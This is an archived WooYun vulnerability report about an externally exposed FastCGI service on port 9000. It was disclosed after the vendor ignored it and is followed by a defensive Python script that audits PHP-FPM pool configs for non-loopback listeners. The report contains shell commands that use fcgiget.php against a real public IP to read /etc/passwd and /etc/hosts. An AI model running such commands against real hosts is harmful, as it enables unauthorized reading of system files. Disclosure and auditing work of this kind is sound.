WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
WooYun Drops article archive: http://drop.zone.ci/
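2015-02-03: Details reported to the vendor; awaiting vendor response
2015-02-08: The vendor has actively ignored the vulnerability; details disclosed to the public
RT
Still the problem of FastCGI being exposed externally; posting it.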
[root@localhost FastCGI]# /usr/local/php/bin/php fcgiget.php 113.106.100.82:9000/etc/passwd
[root@localhost FastCGI]# /usr/local/php/bin/php fcgiget.php 113.106.100.82:9000/etc/hosts
X-Powered-By: PHP/5.2.6-3ubuntu4.6
Content-type: text/html
Do not expose it externally
Severity: no impact, ignored by vendor
Ignored at: 2015-02-08 19:28
None yet
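A check for the fix suggested above ("do not expose it externally"), as an added example that is not part of the original report: it audits pool configuration text for FastCGI listeners bound beyond loopback. It assumes the backend is PHP-FPM (the report only shows a PHP FastCGI service on port 9000); the sample configuration is constructed.

```python
import ipaddress
import re

# Constructed sample pool configuration (not taken from the reported host).
SAMPLE_CONF = """
[www]
listen = 9000
[api]
listen = 0.0.0.0:9001
listen.allowed_clients = 127.0.0.1
[admin]
listen = 127.0.0.1:9002
[sock]
listen = /run/php-fpm/sock.sock
; listen = 10.0.0.5:9000
"""

def is_loopback(host):
    """True for localhost or a literal loopback IPv4/IPv6 address."""
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host.strip("[]")).is_loopback
    except ValueError:
        return False  # empty or unparseable host: treat as not loopback

def verdict(settings):
    listen = settings["listen"]
    if listen.startswith("/"):
        return "ok"  # unix socket, governed by file permissions
    # A bare port ("9000") binds every address, so the host part is empty.
    host = listen.rsplit(":", 1)[0] if ":" in listen else ""
    if is_loopback(host):
        return "ok"
    # allowed_clients filters by source IP, but the port still listens off-host.
    return "restricted" if settings.get("listen.allowed_clients") else "exposed"

def audit(conf_text):
    """Return {pool: 'ok' | 'restricted' | 'exposed'} for pools that set listen."""
    pools, pool = {}, "global"
    for raw in conf_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts a comment
        section = re.fullmatch(r"\[(.+)\]", line)
        if section:
            pool = section.group(1)
        elif "=" in line:
            key, _, value = line.partition("=")
            pools.setdefault(pool, {})[key.strip()] = value.strip()
    return {name: verdict(s) for name, s in pools.items() if "listen" in s}
```

Pools reported as "exposed" or "restricted" should be rebound to loopback or a unix socket, with the port also blocked at the host firewall.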